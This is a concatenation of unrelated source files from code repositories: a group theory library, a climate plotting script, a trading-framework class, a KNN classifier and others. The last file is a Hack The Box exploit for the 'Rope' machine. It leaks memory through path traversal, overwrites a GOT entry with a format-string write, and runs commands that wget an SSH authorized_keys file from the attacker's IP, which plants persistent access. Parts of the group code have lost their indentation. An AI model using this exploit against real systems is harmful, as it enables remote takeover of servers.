		identity in g, g^2, g^3, ... is g^{ord(g)-1} = g^-1.
		"""
		p = g
		while True:
			tmp = self.op(p, g)
			if tmp == self.identity():
				return p
			p = tmp
	def leftconjugate(self, g: int, x: int) -> int:
		"""
		gxg-1
		"""
		return reduce(self.op, [g, x, self.inverse(g)])
	def rightconjugate(self, g: int, x: int) -> int:
		"""
		g-1xg
		"""
		return reduce(self.op, [self.inverse(g), x, g])
	def commutator(self, g: int, h: int) -> int:
		"""
		g-1h-1gh

		Uses (hg)^-1 = g^-1 h^-1 to invert both factors with one call.
		"""
		return reduce(self.op, [self.inverse(self.op(h, g)), g, h])
	def leftcoset(self, H: iter, g: int) -> set:
		"""
		gH = {gh : h∈H}
		"""
		return {self.op(g, h) for h in H}
	def rightcoset(self, H: iter, g: int) -> set:
		"""
		Hg = {hg : h∈H}
		"""
		return {self.op(h, g) for h in H}
	def conjugacyClass(self, x: int) -> set:
		"""
		Cl(x) = {g-1xg : g∈G}
		"""
		return {self.leftconjugate(g, x) for g in self}
def conjugacyClasses(self) -> typing.List[set]:
Cl = []
for i in self:
b = False
for C in Cl:
if i in C:
b = True
continue
if not b:
Cl.append(self.conjugacyClass(i))
return Cl
	def isSubgroup(self, H: typing.Union[list,set]) -> bool:
		"""True iff H (element indices of G) forms a subgroup.

		Lagrange pre-check: |H| must divide |G|.  A finite non-empty subset
		of a finite group that is closed under the operation is a subgroup.
		"""
		if self.card % len(H) != 0:
			return False
		for h in H:
			for k in H:
				if self.op(h, k) not in H:
					return False
		return True
	def isNormal(self, H: typing.Union[list,set]) -> bool:
		"""
		Test if H is normal in G
		H = list/set with indices of elements of G
		"""
		if not self.isSubgroup(H):
			return False
		# Index-2 subgroups, and any subgroup of an abelian group, are normal.
		if self.card == 2*len(H) or self.isAbelian():
			return True
		H = set(H)
		S = {self.identity()}
		for h in H:
			# S accumulates elements of H whose conjugates are already
			# verified, so each cyclic subgroup of H is checked only once.
			if h in S:
				continue
			for g in self:
				if not self.leftconjugate(g, h) in H:
					return False
			powers = [h]
			while True:
				t = self.op(h, powers[-1])
				if t == self.identity() or t in S:
					break
				powers.append(t)
			for s in list(S):
				for x in powers:
					S.add(self.op(x, s))
		return True
	def isAbelian(self) -> bool:
		"""
		Returns true if G is abelian

		The result is cached in self.abelian.  Elements already known to
		commute (the set S, grown cyclic-subgroup-by-cyclic-subgroup) are
		skipped, mirroring center().
		"""
		if self.abelian != None:
			return self.abelian
		elif self.cyclic:
			self.abelian = True
			return True
		else:
			S = {self.identity()}
			for g in self:
				if g in S:
					continue
				for s in S:
					if self.op(s, g) != self.op(g, s):
						self.abelian = False
						return False
				powers = [g]
				while True:
					t = self.op(g, powers[-1])
					if t == self.identity() or t in S:
						break
					powers.append(t)
				for s in list(S):
					for x in powers:
						S.add(self.op(x, s))
			self.abelian = True
			return self.abelian
	def isCyclic(self) -> bool:
		"""True iff G has an element of order |G|; result is cached in self.cyclic."""
		if self.cyclic == None:
			if isprime(self.card):
				# Prime order: cyclic, abelian and simple all at once.
				self.cyclic = True
				self.abelian = True
				self.simple = True
				return True
			if not self.isAbelian():
				self.cyclic = False
				return False
			# orders(True) maps order -> elements; |G| among its keys means
			# some element generates the whole group.
			self.cyclic = self.card in self.orders(True)
			return self.cyclic
		return self.cyclic
	def isSimple(self) -> bool:
		"""True/False when decidable by cheap criteria, None when undecided."""
		if self.simple != None:
			return self.simple
		decomp = factorint(self.card)
		if len(decomp) == 1 and list(decomp.values())[0] == 1: #isprime
			self.simple = True
			return True
		elif self.card%2==1 or len(decomp) <= 2: # Feit-Thompson and Burnside's Theorems
			self.simple = False
			return False
		if self.isSolvable():
			return False
		# TODO analize sylow subgroups
		return None
def isIsomorphic(self, other) -> bool:
if repr(self) == repr(other):
return True
if self.card != other.card or (self.isAbelian() != other.isAbelian()) or (self.isCyclic() != other.isCyclic()):
return False
o1 = self.orders(True)
o2 = other.orders(True)
lo1 = {k:len(v) for k,v in o1}
lo2 = {k:len(v) for k,v in o2}
if lo1 != lo2:
return False
elif self.isAbelian() and other.isAbelian():
return True
## c1 = self.conjugacyClasses()
## c2 = other.conjugacyClasses()
##
## lc1 = {k:len(v) for k,v in c1}
## lc2 = {k:len(v) for k,v in c2}
# TODO
	def __iter__(self):
		"""Iterate over the element indices 0..card-1 (see GroupIter)."""
		return GroupIter(self)
	def __truediv__(self, N: set):
		"""G / N : quotient group by the normal subgroup N."""
		from groups import Quotient
		return Quotient(self, N)
	def __mul__(self, H):
		"""G * H : direct product."""
		from groups import Direct
		return Direct(self, H)
	def __pow__(self, n: int):
		"""G ** n : direct product of n copies of G."""
		from groups import Direct
		return Direct([self]*n)
	def __getitem__(self, i: int):
		"""G[i] : the i-th element (delegates to self.element)."""
		return self.element(i)
	def __eq__(self, H):
		"""Equality is isomorphism (NOTE: __hash__ is not redefined to match)."""
		return self.isIsomorphic(H)
class GroupIter():
	"""Iterator yielding the element indices 0 .. G.card-1 of a group G."""
	def __init__(self, G):
		self.G = G
		self.index = 0
	def __next__(self):
		if self.index >= self.G.card:
			raise StopIteration()
		current = self.index
		self.index += 1
		return current
def cayleyTable(G, truerepr: bool =False) -> None:
	"""
	truerepr True prints element name
	False prints element index

	Prints |G| comma-separated rows; row j, column i holds the product j*i.
	"""
	if truerepr:
		T = ([G[G.op(j, i)] for i in G]for j in G)
	else:
		T = ([G.op(j, i) for i in G]for j in G)
	for i in T:
		print(",".join(str(j) for j in i))
def functioninverse(f:list) -> list:
	"""Return the inverse of the permutation f (f[i] == j  =>  result[j] == i)."""
	inv = [None]*len(f)
	for position, image in enumerate(f):
		inv[image] = position
	return inv
def composition(f: list, g: list) -> list:
	"""
	Returns g◦f, i.e. result[i] = g[f[i]].

	Rewritten as a plain comprehension instead of list(itemgetter(*f)(g)):
	itemgetter with a single index returns a bare value (not a tuple), so
	the original raised TypeError whenever len(f) <= 1.
	"""
	return [g[i] for i in f]
def testassocrand(H: Group, n: int) -> bool:
	"""Probabilistic associativity check on n random triples (a, b, c).

	Prints and returns False on the first counterexample, True otherwise.
	"""
	for _ in range(n):
		a,b,c = (randint(0,H.card-1) for _ in range(3))
		if H.op(H.op(a,b),c) != H.op(a,H.op(b,c)):
			print("Non associative",a,b,c)
			print(H.op(H.op(a,b),c), H.op(a,H.op(b,c)))
			return False
	return True
def count_partitions(n: int) -> int:
	"""Return p(n), the number of integer partitions of n (0 when n < 0)."""
	if n < 0:
		return 0
	if n < 2:
		return 1
	# Count partitions of n using only parts 1..n-1, then add 1 for [n] itself.
	ways = [1] + [0] * n
	for part in range(1, n):
		for total in range(part, n + 1):
			ways[total] += ways[total - part]
	return ways[n] + 1
def count_abelian_groups(n: int) -> int:
	"""Number of abelian groups of order n: the product of p(e) over the
	multiplicities e of the prime factorisation (0 for n < 1)."""
	if n < 1:
		return 0
	if n < 4:
		return 1
	exponent_multiplicity = {}
	for exponent in factorint(n).values():
		exponent_multiplicity[exponent] = exponent_multiplicity.get(exponent, 0) + 1
	result = 1
	for exponent, times in exponent_multiplicity.items():
		result *= count_partitions(exponent) ** times
	return result
def count_groups(order: int) -> int:
	"""
	Counting groups: gnus, moas and other exotica https://www.math.auckland.ac.nz/~obrien/research/gnu.pdf
	OEIS A000001: Number of groups of order n. https://oeis.org/A000001
	Enumeration of groups whose order factorises in at most 4 primes: https://arxiv.org/pdf/1702.02616.pdf

	Returns the number of groups of the given order when a closed formula is
	known (prime powers up to p^7 plus 2^8..2^10, orders with at most three
	prime factors, square-free orders via Hölder's formula), -1 otherwise.
	NOTE(review): several formulas use true division "/" and so return floats
	on Python 3 -- confirm integrality / cast if an int is required.
	"""
	if order <= 0:
		return 0
	if order < 4:
		return 1
	f = factorint(order)
	l = list(f.items())
	l.sort(key=itemgetter(0))
	def w(r,s):
		# indicator: 1 iff s divides r
		return 1 if r%s==0 else 0
	if len(l) == 1: # p-group
		p,power = l[0]
		if power <= 2:
			return power
		if power == 3:
			return 5
		if power == 4:
			return 14 if p == 2 else 15
		if power == 5:
			if p == 2:
				return 51
			if p == 3:
				return 67
			return 61 + 2*p + 2*gcd(p-1,3) + gcd(p-1,4)
		if power == 6:
			if p == 2:
				return 267
			if p == 3:
				return 504
			return 344 + 39*p + 3*p**2 + 24*gcd(p-1,3) + 11*gcd(p-1,4) + 2*gcd(p-1,5)
		if power == 7:
			if p == 2:
				return 2328
			if p == 3:
				return 9310
			if p == 5:
				return 34297
			return 2455 + 707*p + 170*p**2 + 44*p**3 + 12*p**4 + 3*p**5 + (291+44*p+4*p**2)*gcd(p-1,3) + (135+19*p+p**2)*gcd(p-1,4) + (31+3*p)*gcd(p-1,5) + 4*gcd(p-1,7) + 5*gcd(p-1,8) + gcd(p-1,9)
		if power < 11 and p == 2:
			# tabulated counts for 2^8, 2^9, 2^10
			return [56092,10494213,49487365422][power-8]
		return -1
	if len(l) == 2:
		a,b = l[0][1],l[1][1] # exponents
		if a==b==1: # pq
			return 1 if gcd(l[0][0],l[1][0]-1) == 1 else 2
		if {a,b} == {1,2}: #p^2q
			p,q = l[0][0],l[1][0]
			if b == 2:
				p,q=q,p
			if q == 2:
				return 5
			return 2 + (q+5)/2*w(p-1,q) + w(p+1,q) + 2*w(q-1,p) + w(q-1,p**2)
		if {a,b} == {1,3}: #p^3q
			p,q = l[0][0],l[1][0]
			if b == 3:
				p,q=q,p
			if p==2 and q==3:
				return 15
			if p==2 and q==7:
				return 13
			if q==2:
				return 15
			if p==2:
				return 12 + 2*w(q-1,4) + w(q-1,8)
			if q==3:
				return 5 + 14*w(p-1,3) + 2*w(p+1,3)
			return 5 + (q**2+13*q+36)/6*w(p-1,q) + (p+5)*w(q-1,p) + 2/3*w(q-1,3)*w(p-1,q) + w((p+1)*(p**2+p+1),q) + w(p+1,q) + 2*w(q-1,p**2) + w(q-1,p**3)
		if a==b==2: # p^2q^2, p < q
			p,q = l[0][0],l[1][0]
			if p==2:
				return 14 if q==3 else 12+4*w(q-1,4)
			return 4 + (p**2+p+4)/2*w(q-1,p**2) + (p+6)*w(q-1,p) + 2*w(q+1,p) + w(q+1,p**2)
		return -1
	if len(l) == 3:
		p,q,r = (l[i][0] for i in range(3))
		if all(l[i][1] == 1 for i in range(3)): # square free order
			# t encodes which divisibility conditions hold among p, q, r
			t = ((q-1)%p == 0)*4 + ((r-1)%p == 0)*2 + ((r-1)%q == 0)
			return [1,2,2,4,2,3,p+2,p+4][t]
		if sorted(f.values()) == [1,1,2]: # p**2*q*r, q < r
			if f[q] == 2:
				p,q=q,p
			elif f[r] == 2:
				p,q,r = r,p,q
			if p==2 and q==3 and r==5:
				return 13
			if q==2:
				return 10 + (2*r+7)*w(p-1,r) + 3*w(p+1,r) + 6*w(r-1,p) + 2*w(r-1,p**2)
			return 2 + p*(p-1)*w(q-1,p**2)*w(r-1,p**2) + \
				(p-1)*(w(q-1,p**2)*w(r-1,p) + w(r-1,p**2)*w(q-1,p) + 2*w(r-1,p)**w(q-1,p)) + \
				(q-1)*(q+4)/2*w(p-1,q)*w(r-1,q) + \
				(q-1)/2*(w(p+1,q)*w(r-1,q) + w(p-1,q) + w(p-1,q*r) + 2*w(r-1,p*q)*w(p-1,q)) + \
				(q*r+1)/2*w(p-1,q*r) + \
				(r+5)/2*w(p-1,r)*(1 + w(p-1,q)) + \
				w(p**2-1,q*r) + 2*w(r-1,p*q) + w(r-1,p)*w(p-1,q) + w(r-1,p**2*q) + \
				w(r-1,p)*w(q-1,p) + 2*w(q-1,p) + 3*w(p-1,q) + 2*w(r-1,p) + \
				2*w(r-1,q) + w(r-1,p**2) + w(q-1,p**2) + w(p+1,r) + w(p+1,q)
		return -1
	if all(p == 1 for p in f.values()): # square free order, Hölder's formula
		from itertools import product
		primes = set(f.keys())
		def c(p,primes):
			# number of primes q in `primes` with q ≡ 1 (mod p)
			count = 0
			for q in primes:
				count += w(q-1,p)
			return count
		count = 0
		for comb in product(*[[0,1]]*len(primes)): # combinations of all primes to compute divisors
			leftprimes = {p for i,p in enumerate(primes) if comb[i]}
			m = reduce(lambda a,b:a*b,leftprimes,1)
			prod = 1
			for p in primes-leftprimes:
				prod *= ((p**c(p,leftprimes)-1)/(p-1))
			count += prod
		return count
	return -1
def count_non_abelian_groups(n):
	"""Number of non-abelian groups of order n, or -1 when count_groups(n) is unknown."""
	total = count_groups(n)
	return -1 if total == -1 else total - count_abelian_groups(n)
class Subset():
	"""Indexed view of a subset H of a group G (indices 0..len(H)-1)."""
	def __init__(self, G, H):
		members = list(H)
		self.element = lambda k: members[k]
		self.card = len(members)
		# op returns an element of G; it cannot be mapped back to an index of
		# H because H need not be closed under G's operation.
		self.op = lambda g, h: G.op(self.element(g), self.element(h))
		self.subgroup = None
if __name__ == "__main__":
	# Script entry point: interactive experiments with the group library.
	from groups import *
	from testraster import saveImage
	# Example session (kept commented out for reference):
##	G = Cyclic(2)**3
##	A = Aut2(G)
##	A.generators = {128,129,130}
##	AA = Aut2(A)
| [
"mrcamoga@gmail.com"
] | mrcamoga@gmail.com |
682e551baae2d8218700c8db937894c61af7b8fa | 3a0747429d28a4027aa84c051d73aa42b8adf69d | /sakuzu32/hov_wh04_sa.py | 5cfb7e66416a0c61a166eedc7783190f6812092e | [] | no_license | shukubota/b4 | ee06f1b49b2e99d96b1b0e4434d1976e9507bbda | 765ab46c763ced72c70c97ea8c4f38370688af4b | refs/heads/master | 2021-01-11T05:55:15.513100 | 2018-11-08T08:12:06 | 2018-11-08T08:12:06 | 94,946,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,941 | py | #coding:utf-8
# Builds a 24-hour Hovmöller-style diagram averaged along a diagonal band
# over the South-America domain and writes it under plotdata/wh04/<dire>/.
# NOTE(review): Python 2 script (print statements); loop-body indentation
# was reconstructed from the control flow -- verify against the original.
import sys
sys.path.append('/home/kubotashu/kubota/labo/sakuzu/sakuzu/sakuzu09/')
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
from function import *
import os.path
import matplotlib.cm as cm
#####################
# grid extent of the input file
#########################
lon1=-90.
lon2=-70.
lat1=0.
lat2=15.
grid=0.1
local=-6
##################
grid2=0.75
##############################
# extent of the figure to draw
#########################
#test rectangle
#lon3=96.
#lon4=101.
#lat3=-5.
#new guinia
#lon3=135.
#lon4=145.
#lat3=-10.
#br west
#lon3=116.
#lon4=118.
#lat3=6.
#wide=8. # must be a multiple of grid
#dire="brwest"
#sa
dire="sa"
lon3=-86.
lon4=-71.
lat3=-3.
wide=10.
length=lon4-lon3
lat4=lat3+length
nstart=int((lon3-lon1)/grid)
nend=int((lon4-lon1)/grid)
mstart=int((lat3-lat1)/grid)
mend=int((lat4-lat1)/grid)
widenum=int(wide/grid)+1
lon=np.arange(lon1,lon2+grid,grid)
lat=np.arange(lat1,lat2+grid,grid)
lonp=np.arange(lon3,lon4+grid,grid)
latp=np.arange(lat3,lat4+grid,grid)
msize,nsize=getsize(lon,lat)
mpsize,npsize=getsize(lonp,latp)
for i in range(1,2):
    plotcp=np.zeros((npsize,mpsize))
    hov=np.zeros((24,mpsize))
    for hour in range(0,24):
        # convert local hour to the UTC index used in the data file names
        lt=hour-local
        if lt<0:
            lt+=24
        if lt>23:
            lt-=24
        plotdata=np.loadtxt("/home/kubotashu/kubota/labo/sakuzu/sakuzu/sakuzu36/plotdata_wh04_rv/"+"%02d"%lt+".dat")
        #################
        #CUT
        ################
        #plotcp=plotdata[mstart:mend+1,nstart:nend+1]
        # average over a band of width `widenum` across the diagonal
        for j in range(0,mpsize):
            for k in range(0,widenum):
                hov[hour,j]+=plotdata[mend-j-k,nstart+j-k]
            hov[hour,j]=hov[hour,j]/widenum
        #print np.shape(plotcp)
        #print hour
    # repeat hour 0 at the end so the diagram wraps around the full day
    hovp=np.vstack((hov,hov[0]))
    print np.shape(hovp)
    filename="plotdata/wh04/"+dire+"/hovphase"+"%d"%i+".dat"
    print filename
    #print np.shape(hovp)
    np.savetxt(filename,hovp,delimiter=",")
###########################################################
| [
"noreply@github.com"
] | noreply@github.com |
7e91cea1d6c02d21774bddccf502f877e6aac5ae | 3798583928530b4c5366e2dace526a4ce3e0c9bd | /rqrobot/core/strategy_universe.py | 9f6c7cbcb319583c13b92cd86e0453a277ec07bd | [
"Apache-2.0"
] | permissive | luhouxiang/rqrobot | bc80a5458f8a8c0631e566d781db1497939b641f | 0b0094b0e2d061e628c570a06a7620e5fb48d342 | refs/heads/master | 2020-05-17T14:40:04.495201 | 2019-05-04T13:17:04 | 2019-05-04T13:17:04 | 183,768,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,974 | py | # -*- coding: utf-8 -*-
#
# Copyright 2017 Ricequant, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import json
import copy
from rqrobot.events import EVENT, Event
from rqrobot.environment import Environment
from rqrobot.model.instrument import Instrument
class StrategyUniverse(object):
    """Holds the set of instruments the strategy trades and publishes a
    POST_UNIVERSE_CHANGED event whenever that set changes."""
    def __init__(self):
        self._set = set()
        # prune de-listed instruments right after each trading session
        Environment.get_instance().event_bus.prepend_listener(EVENT.AFTER_TRADING, self._clear_de_listed)
    def get_state(self):
        """Serialise the universe to bytes (sorted JSON) for persistence."""
        return json.dumps(sorted(self._set)).encode('utf-8')
    def set_state(self, state):
        """Restore a universe previously produced by get_state()."""
        l = json.loads(state.decode('utf-8'))
        self.update(l)
    def update(self, universe):
        """Replace the universe; accepts a single id/Instrument or an iterable.

        Publishes POST_UNIVERSE_CHANGED only if the set actually changed.
        """
        if isinstance(universe, (six.string_types, Instrument)):
            universe = [universe]
        new_set = set(universe)
        if new_set != self._set:
            self._set = new_set
            Environment.get_instance().event_bus.publish_event(Event(EVENT.POST_UNIVERSE_CHANGED, universe=self._set))
    def get(self):
        """Return a shallow copy of the current universe."""
        return copy.copy(self._set)
    def _clear_de_listed(self, event):
        """AFTER_TRADING hook: drop instruments whose de-list date has passed."""
        de_listed = set()
        env = Environment.get_instance()
        for o in self._set:
            i = env.data_proxy.instruments(o)
            if i.de_listed_date <= env.trading_dt:
                de_listed.add(o)
        if de_listed:
            self._set -= de_listed
            env.event_bus.publish_event(Event(EVENT.POST_UNIVERSE_CHANGED, universe=self._set))
| [
"luhouxiang@hotmail.com"
] | luhouxiang@hotmail.com |
20b19b2536c1fbeefe644e9d821ef833bc2bd42b | 4a11d12d4b3da1efca5638d552cdc9faf9850fbd | /web/views/ach.py | 9a153ef8d184963a71e60d2814b907dc8924ea25 | [
"MIT"
] | permissive | tjcsl/wedge | fc0c46a4bb1d3e993e44fbe58dc5b353a232b7cd | 69a7b0d3cfb5b35544a47522e736cac47fd815e6 | refs/heads/master | 2020-04-07T11:42:13.762935 | 2013-11-10T15:57:42 | 2013-11-10T15:57:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 329 | py | from web.auth import loginrequired
from web.ach import *
from flask import session, request, render_template
@loginrequired
def ach():
    """Render the achievements page for a user.

    The session user is shown by default; an explicit ``?username=`` query
    parameter overrides it.
    """
    name = session["username"] if "username" not in request.args else request.args["username"]
    # local name shadows the view function -- harmless here, only returned
    ach = get_user_achievements(name)
    return render_template("ach.html", name=name, ach=ach)
| [
"fwilson@fwilson.me"
] | fwilson@fwilson.me |
b48fc36d7a90ec6c3bce9e94507a3efc2825d9b0 | ce51279f51070a954054a28bdbdecde3aa1f182b | /Move Zeroes.py | c0b7e2cf77667832411213b3426cb2ca5f283d6f | [] | no_license | unswjasonhu/leetcode | bc060283fb9cb3d995710591588007d4a87fde2a | dd32ec3425f40461e62c58125e2e078dae236ee1 | refs/heads/master | 2016-08-08T23:54:10.542840 | 2016-01-21T05:00:07 | 2016-01-21T05:00:07 | 46,773,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | __author__ = 'Jason'
class Solution(object):
    def moveZeroes(self, nums):
        """
        :type nums: List[int]
        :rtype: void Do not return anything, modify nums in-place instead.

        Two-pointer rewrite: the original appended/removed zeros while
        indexing over the mutating list and used a Python 2 ``print``
        statement (a SyntaxError on Python 3).
        """
        write = 0
        # Compact all non-zero values to the front, preserving their order.
        for value in nums:
            if value != 0:
                nums[write] = value
                write += 1
        # Fill the remainder with zeros.
        for i in range(write, len(nums)):
            nums[i] = 0
| [
"jasonhu.au2"
] | jasonhu.au2 |
801c42a9cc2b11ec0ce7278cd4201251a3d8cf7d | 02f1f32827119f086baed04eb8db9ac230b6ba97 | /Classification/KNN/knn.py | 2e9bb85ba3f325dad8b705f7d51e5b366f3998fd | [] | no_license | HsiangHung/Machine_Learning_Note | 82182bcff2f67e9b933d447a384aa8ec7e52b53b | 300f2bba5edaca25e66dcce0c4edd3203c8f22fb | refs/heads/master | 2023-09-01T13:40:57.636906 | 2023-08-31T05:32:23 | 2023-08-31T05:32:23 | 163,471,072 | 4 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,620 | py | '''
sklearn: https://stackabuse.com/k-nearest-neighbors-algorithm-in-python-and-scikit-learn/
Python from scratch: https://machinelearningmastery.com/tutorial-to-implement-k-nearest-neighbors-in-python-from-scratch/
NOTE: we should standardize data if necessary
'''
import numpy as np
import heapq
class KnnClassifier(object):
def __init__(self, k=5):
self.X = None
self.y = None
self.neighbor = k
def fit(self, X, y):
self.X = X[:]
self.y = y[:]
def predict(self, Xtest):
preds = []
for data in Xtest:
heap = []
for i in range(len(self.X)):
heapq.heappush(heap, (self.distance(data, self.X[i]), self.y[i]))
# print (self.distance(data, self.X[i]))
pred = {0: 0, 1:0}
k = 0
while k < self.neighbor:
dist, y = heapq.heappop(heap)
if dist != 0.0:
pred[y] += 1
k += 1
preds.append(0 if pred[0] >= pred[1] else 1)
return preds
def distance(self, a, b):
return np.sqrt(sum([(a[i]-b[i])**2 for i in range(len(a))]))
# Demo / smoke-test data: six labelled 2-D points, two classes.
X = [[2.7810836,2.550537003],
     [1.465489372,2.362125076],
     [3.396561688,4.400293529],
     [7.627531214,2.759262235],
     [5.332441248,2.088626775],
     [6.922596716,1.77106367]]
y = [0,0,0,1,1,1]
# k=6 lets every training point vote (zero-distance matches are skipped).
knn = KnnClassifier(k=6)
knn.fit(X, y)
X_test = [[1.38807019,1.850220317],
          [3.06407232,3.005305973],
          [8.675418651,-0.242068655],
          [7.673756466,3.508563011]]
y_test = [0,0,1,1]
y_pred = knn.predict(X_test)
print (y_pred) | [
"Hsiang.Hung2015@gmail.com"
] | Hsiang.Hung2015@gmail.com |
0d7725141ae936d59ae566697940703666446737 | 1f5022b8edfda8f1226a608cb0028e8e057704ce | /excript/app-comerciais-kivy/aulas/entradaDados.py | 56b87cfceba451818625686f075146f328708615 | [] | no_license | felipecechin/python | 75372545c96cb79826861dca40c8211e4108e687 | 194932b0e93947ba2ba17bdbcdf5dc11de98f195 | refs/heads/master | 2022-01-11T18:05:55.058248 | 2019-06-04T03:21:16 | 2019-06-04T03:21:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | login = input("Login:")
senha = input("Senha:")
print("Login:",login,"senha:",senha)
print("Login: %s senha: %s" %(login,senha)) | [
"ficechin@hotmail.com"
] | ficechin@hotmail.com |
3e8fbc487395171405ee2db183f9bb360c8ad542 | 60c8d2e77bd7c4c646f33d09aca6cc2fae143c3d | /tools_SSD.py | 942be797a37d39410fa57fd0ab9fe9490d7bc377 | [] | no_license | dynamicguy/tools | 866eb881d601866b0a528613773763dfd4dec36c | e718ff9c118d2a9081d532929ba631be95627fcf | refs/heads/main | 2023-03-26T11:03:04.656851 | 2021-03-06T19:45:16 | 2021-03-06T19:45:16 | 345,179,890 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,608 | py | import numpy
import cv2
import tools_image
# ----------------------------------------------------------------------------------------------------------------------
import tools_YOLO
from keras.layers import Input
# ----------------------------------------------------------------------------------------------------------------------
def generate_colors(N):
    """Delegate to tools_YOLO: N visually distinct colors."""
    return tools_YOLO.generate_colors(N)
# ----------------------------------------------------------------------------------------------------------------------
def get_markup(filename_in, boxes_yxyx, scores, classes):
    """Delegate to tools_YOLO: build markup records for the detections."""
    return tools_YOLO.get_markup(filename_in, boxes_yxyx, scores, classes)
# ----------------------------------------------------------------------------------------------------------------------
def draw_and_save(
    filename_out, image, boxes_yxyx, scores, classes, colors, class_names
):
    """Delegate to tools_YOLO: draw detections on image and save to filename_out."""
    return tools_YOLO.draw_and_save(
        filename_out, image, boxes_yxyx, scores, classes, colors, class_names
    )
# ----------------------------------------------------------------------------------------------------------------------
def get_true_boxes(filename, delim=" ", limit=10000):
    """Parse a ground-truth annotation file.

    Each line after the header is: image_name x_min y_min x_max y_max class_id
    (delim-separated).  Returns one numpy array of
    [class_id, x_min, y_min, x_max, y_max] rows per distinct image, images in
    sorted-filename order.
    NOTE(review): numpy.float is removed in numpy >= 1.24 -- verify runtime.
    """
    with open(filename) as f:
        lines = f.readlines()[1:limit]
    list_filenames = [line.split(" ")[0] for line in lines]
    filenames_dict = sorted(set(list_filenames))
    true_boxes = []
    for filename in filenames_dict:
        local_boxes = []
        for line in lines:
            split = line.split(delim)
            if split[0] == filename:
                class_ID = int(split[5])
                x_min, y_min, x_max, y_max = numpy.array(split[1:5]).astype(numpy.float)
                local_boxes.append([class_ID, x_min, y_min, x_max, y_max])
        true_boxes.append(numpy.array(local_boxes))
    return true_boxes
# ----------------------------------------------------------------------------------------------------------------------
def get_images(foldername, filename, delim=" ", resized_target=None, limit=10000):
    """Load the images referenced by an annotation file (see get_true_boxes).

    Images are read with OpenCV, converted via tools_image.rgb2bgr, optionally
    resized to resized_target (w, h), and returned as a single numpy array in
    sorted-filename order.
    """
    with open(filename) as f:
        lines = f.readlines()[1:limit]
    list_filenames = [line.split(" ")[0] for line in lines]
    filenames_dict = sorted(set(list_filenames))
    images = []
    for filename in filenames_dict:
        image = tools_image.rgb2bgr(cv2.imread(foldername + filename))
        if resized_target is not None:
            image = cv2.resize(image, resized_target)
        images.append(image)
    return numpy.array(images)
# ----------------------------------------------------------------------------------------------------------------------
| [
"nurul@ferdo.us"
] | nurul@ferdo.us |
36d6859f91412f1d9bc50c8d9093e25601f1b157 | 854b94d7be92582bd191a7cb63143a95e5b5c337 | /hyfetch/distros/postmarketos_small.py | 4dc2bd42a651c2a3c7f18c7ef7c07c17cd241449 | [
"MIT"
] | permissive | hykilpikonna/hyfetch | 673c0c999d0f3f542349824495ad6004f450ebac | 98863df16d70b030696f4b94080d114396320f35 | refs/heads/master | 2023-08-17T10:41:10.289997 | 2023-08-17T03:37:23 | 2023-08-17T03:37:23 | 479,913,941 | 447 | 78 | MIT | 2023-09-14T14:39:18 | 2022-04-10T04:38:15 | Shell | UTF-8 | Python | false | false | 325 | py | # This file is automatically generated. Please do not modify.
from . import AsciiArt
postmarketos_small = AsciiArt(match=r'''"postmarketos_small"''', color='2 7', ascii=r"""
${c1} /\
/ \
/ \
\__ \
/\__ \ _\
/ / \/ __
/ / ____/ \
/ \ \ \
/_____/ /________\
""")
| [
"me@hydev.org"
] | me@hydev.org |
2c8f4f7227f82dcabce679d0b612e3e0c4bebb05 | c3f23317487154ace20c9baf5eafc79c0dfac55a | /Rope/rope_fmtExploit.py | 926fff23a1aeddc70e49482f882a92e2bda37e28 | [] | no_license | gbrsh/htb_exploits | a54d946355966c733d6a6d6ddc7c95d6ab5ae4a6 | 36175b1a258f7fd246ff815cc29facebf10ae0a1 | refs/heads/main | 2023-02-15T17:59:17.023361 | 2021-01-18T13:38:08 | 2021-01-18T13:38:08 | 330,675,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,498 | py | import base64
import urllib
from struct import pack
from pwn import *
myip = "10.10.14.2"
host = "10.10.10.148"
got_base = ""
got_printf = ""
libc_printf = ""
libc_system = ""
got_puts = ""
def mapsExtract():
    """Leak /proc/self/maps via the server's path-traversal bug and return
    the base address (hex string) of its writable mapping."""
    cPrm = "GET"
    aPrm = "../../../../../proc/self/maps"
    rPrm = "Range: bytes=0-9999"
    payload = cPrm + " " + aPrm + "\n" + rPrm + "\n"
    pwn = remote(host, 9999, level = 'error')
    pwn.sendline(payload + "\n")
    recv = pwn.recvline_contains("rw-p", "httpserver")
    # print recv
    return recv[:recv.find('-')]
def memExtract():
    """Read 4 bytes of /proc/self/mem at the printf GOT slot; the bytes
    arrive little-endian, so they are reversed before hex-encoding."""
    cPrm = "GET"
    aPrm = "../../../../../proc/self/mem"
    rPrm = "Range: bytes=" + str(int(got_printf, 16)) + "-" + str(int(got_printf, 16) + 3)
    payload = cPrm + " " + aPrm + "\n" + rPrm + "\n"
    pwn = remote(host, 9999, level = 'error')
    pwn.sendline(payload + "\n")
    recv = pwn.recvall()
    recv = recv.splitlines()[-1][::-1]
    return recv.encode('hex')
def exploitServ(comm):
    """Format-string write patching puts@GOT half-word by half-word, then
    triggering one of three command steps (1=ping, 2=fetch key, 3=chmod)."""
    #remote f7e2 2d10 - memExtract - 13e50
    payload = ""
    fmt_first = libc_system[6:]
    fmt_second = libc_system[2:6]
    faddr = int(fmt_first, 16) -8
    saddr = int(fmt_second, 16) - int(fmt_first, 16)
    if(comm == 1):
        cPrm = "ping${IFS}-c${IFS}1${IFS}"+myip
    if(comm == 2):
        cPrm = "wget${IFS}http://" + myip +":8000/authorized_keys${IFS}-P${IFS}/home/john/.ssh/"
    if(comm == 3):
        cPrm = "chmod${IFS}600${IFS}/home/john/.ssh/authorized_keys"
